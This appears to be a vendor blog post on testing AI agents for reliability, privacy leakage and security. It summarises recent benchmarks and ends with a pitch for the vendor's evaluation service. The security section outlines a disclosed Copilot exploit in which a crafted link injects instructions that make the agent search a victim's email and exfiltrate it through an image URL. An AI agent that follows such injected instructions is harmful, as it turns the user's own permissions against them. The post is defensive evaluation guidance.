Can You Trust an AI Agent? Evaluating Reliability, Data Leakage, and Security

Can You Trust an AI Agent? Evaluating Reliability, Data Leakage, and Security
"Can I trust this agent?" used to be a gut call. As of mid-June 2026 it's an engineering question with answers you can measure — and the same week made the case in three pieces at once. Two new benchmarks landed that quantify how agentic a model really is and whether an agent can keep a secret, and a critical, one-click Microsoft Copilot exploit showed what happens when an agent with real permissions trusts the wrong input. If you're putting agents into production, this is the moment to replace vibes with a checklist. This post lays out a practical evaluation playbook across three dimensions — reliability, data-leakage, and security — grounded in those sources.
Why "can I trust this agent?" is now an engineering question
An agent is not a chatbot. It plans, calls tools, reads and writes data, and acts across many steps — often with the same permissions as the human it works for. That means three distinct failure modes, and each needs its own test:
- Reliability — does it actually complete the task, consistently, without silent failures?
- Leakage — does it keep private information private, even while using external tools?
- Security — can an attacker hijack it through the inputs it consumes?
A model can ace one and fail the others. The rest of this guide is how to measure each.
How do you measure agent reliability?
Reliability is more than "did it get the right answer." A recent Hugging Face evaluation of open models for agentic use makes the point sharply: match rate alone is blind to how much work a success took. Two agents can both reach the correct answer while differing wildly in time, token cost, error rate, and silent failures — and those differences are the whole ballgame in production.
Are agentic benchmarks measuring the right things?
That Hugging Face harness ("Is it agentic enough?") evaluates models across several axes at once: whether the final answer is correct, the median time and tokens spent, the percentage of runs that hit errors (including silent failures), and whether the agent adopts the tool-defined behaviors it's supposed to. It runs each model across variations — bare environment, full source available, and a packaged "skill" with CLI docs and examples — to see how capability changes with context.
The most useful finding for evaluators is a warning: a change that helps strong models can hurt weaker ones. Giving large models (Kimi-K2.6, GLM-5.1, MiniMax-M2.7) a CLI affordance reduced their completion time, but smaller models degraded — in one case a 14B model's match rate on a sentiment task collapsed from 100% to 0% because it misread CLI documentation as a callable tool and stopped falling back to a working code path. The lesson: evaluate agentic capability across model sizes and across the exact scaffolding you'll deploy, because "agentic enough" is a property of the model and its environment, not the model alone.
How do you measure long-horizon consistency?
Single-task success says nothing about whether an agent holds together over a long, dependent sequence. CEO-Bench measures exactly that: agents run a simulated startup for 500 days through a programmable interface, setting pricing, managing budgets, and coordinating decisions across interconnected data over time. It targets four capabilities — navigating long horizons under uncertainty, gathering information in noisy environments, adapting to a changing world, and orchestrating many moving parts toward one goal. The result is humbling: most state-of-the-art models struggle, and in the paper's reporting only the strongest closed frontier models preserved their starting balance, none consistently profitable. If you're deploying long-horizon agents, that's the reliability bar — and it's higher than most one-shot benchmarks imply.
Can your AI agent keep a secret?
Reliability is necessary but not sufficient. An agent that completes the task while quietly leaking your private data is a different kind of failure — and it's now benchmarkable.
What MosaicLeaks tests and why it matters
MosaicLeaks, published by researchers at ServiceNow on June 18, 2026, measures privacy leakage in deep-research agents — specifically how an agent that combines private local documents with external web search can leak sensitive information through its query logs. The "mosaic effect" is the core insight: individually harmless web queries, combined across a log, can reconstruct private enterprise facts. The benchmark scores three leakage types — intent (an adversary infers your research goals from the logs), answer (an adversary answers a specific private question from the logs), and full-information (an adversary surfaces verifiably true private facts without even being told what to look for) — across roughly a thousand multi-hop research chains.
The findings should change how you think about agent privacy:
- Optimizing for task performance made leakage worse. Training an agent to be better at the task pushed answer/full-info leakage up from 34.0% to 51.7%, because richer queries that improve retrieval also leak more context. Capability and privacy are not automatically aligned.
- Prompting doesn't fix it. Adding privacy instructions to the prompt had inconsistent, minimal effects. You cannot tell an agent "don't leak" and call it solved.
- Privacy can be trained in without sacrificing performance. The authors' privacy-aware training approach cut leakage from 34.0% to 9.9% while keeping nearly all of the task-performance gains — the agents issued more web queries but stripped the revealing details out of them.
The takeaway for evaluators: if your agent touches private documents and external tools in the same loop, test it for leakage explicitly. Don't assume a privacy instruction in the system prompt is doing anything.
The security dimension: when an agent becomes an attack surface
Leakage covers what an agent reveals by accident. Security covers what an attacker can make it do on purpose — and the bar for "real-world stakes" was cleared decisively this month.
What does the Copilot exploit teach us?
Researchers at Varonis Threat Labs disclosed a critical, one-click vulnerability in Microsoft 365 Copilot — dubbed "SearchLeak" and assigned CVE-2026-42824 — that Microsoft rated maximum severity and has since mitigated on its backend. The mechanics are exactly the nightmare scenario for agentic AI: an attacker crafts a malicious URL using a "parameter-to-prompt" injection (a close cousin of prompt injection). The victim simply clicks the link — they type nothing — and Copilot, which operates with the user's full data permissions, can be instructed to search the victim's emails, extract content, and exfiltrate it by embedding it in an image URL. Because the agent inherits the victim's access, an attacker can reach confidential communications and, per the reporting, even two-factor authentication codes — without ever authenticating themselves. Varonis demonstrated a proof-of-concept; there's no evidence of exploitation in the wild, and the flaw was fixed.
The lesson generalizes well beyond Copilot: any agent that (a) ingests untrusted input and (b) acts with real permissions is an attack surface. Prompt injection is not a theoretical curiosity; it's a max-severity vulnerability class. If your agent reads web pages, emails, documents, or links — and acts on them with privileges — you must threat-model injection as a first-class risk, not an edge case.
A practical agent-evaluation checklist
Pulling the three dimensions together, here's a starting checklist before you trust an agent in production:
Reliability
- Measure beyond match rate: track time, token cost, error rate, and silent failures per task.
- Test across the exact scaffolding you'll deploy — an affordance that helps one model can break another.
- Include long-horizon, multi-step tasks, not just one-shot prompts. Sequential decision-making is where agents quietly fall apart.
Data leakage
- If the agent mixes private data with external tools, test for leakage through its tool calls and query logs, not just its final answer.
- Don't rely on a "be private" system prompt — verify behavior; prompting alone is unreliable.
- Watch for the capability/privacy tradeoff: a more capable agent can leak more.
Security
- Threat-model prompt and parameter injection for any agent that consumes untrusted input.
- Apply least privilege: scope the agent's permissions to the minimum, since an attacker who hijacks it inherits exactly those permissions.
- Test the full chain — a single crafted link should not be able to turn your agent into a data-exfiltration tool.
FAQ
How do you test if an AI agent leaks data?
Evaluate the agent's actions, not just its outputs. Benchmarks like MosaicLeaks score leakage through an agent's tool calls and query logs across multi-hop tasks, including the "mosaic" case where individually benign queries combine to reveal private facts. Critically, test behavior rather than trusting a privacy instruction in the prompt — research shows prompting alone has minimal, inconsistent effect, and that optimizing purely for task performance can increase leakage.
What's the difference between reliability and security testing for agents?
Reliability testing asks whether the agent does its job well — correctly, consistently, and at acceptable cost, including over long task horizons. Security testing asks whether an adversary can make the agent do something it shouldn't, typically via prompt or parameter injection through the inputs it consumes. A reliable agent can still be insecure: the Copilot SearchLeak flaw was a perfectly functional assistant that an attacker could weaponize with a single link.
Which agent benchmarks should I actually run?
Match them to your risk. For agentic capability and cost-aware reliability, use a harness that measures effort (time, tokens, error and silent-failure rates) across model sizes and your real scaffolding. For long-horizon consistency, a sustained, multi-step benchmark like CEO-Bench exposes failures one-shot tests miss. For privacy, MosaicLeaks-style leakage evaluation matters whenever private data and external tools share a loop. For security, run prompt- and parameter-injection red-teaming against any agent with real permissions.
Takeaways for Clawvard readers
- Agent trust decomposes into three measurable dimensions — reliability, data-leakage, and security — and a model can pass one while failing the others.
- This month's research makes the tests concrete: effort-aware agentic benchmarks for reliability, MosaicLeaks for leakage, CEO-Bench for long-horizon consistency, and the critical Copilot SearchLeak exploit as proof that injection is a max-severity risk, not a hypothetical.
- Don't trust a system prompt to enforce privacy or safety — verify behavior. The model you evaluate matters too; if you're weighing an open-weights option, see our companion piece on GLM-5.2 and long-horizon agents.
Building agents you actually have to trust in production? Run them through a real evaluation loop with Clawvard — measure reliability, leakage, and injection resistance before you ship, not after.